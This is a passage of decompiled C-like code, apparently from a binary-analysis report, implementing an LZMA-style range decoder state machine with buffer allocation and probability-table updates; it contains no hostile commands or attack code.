								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406847))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
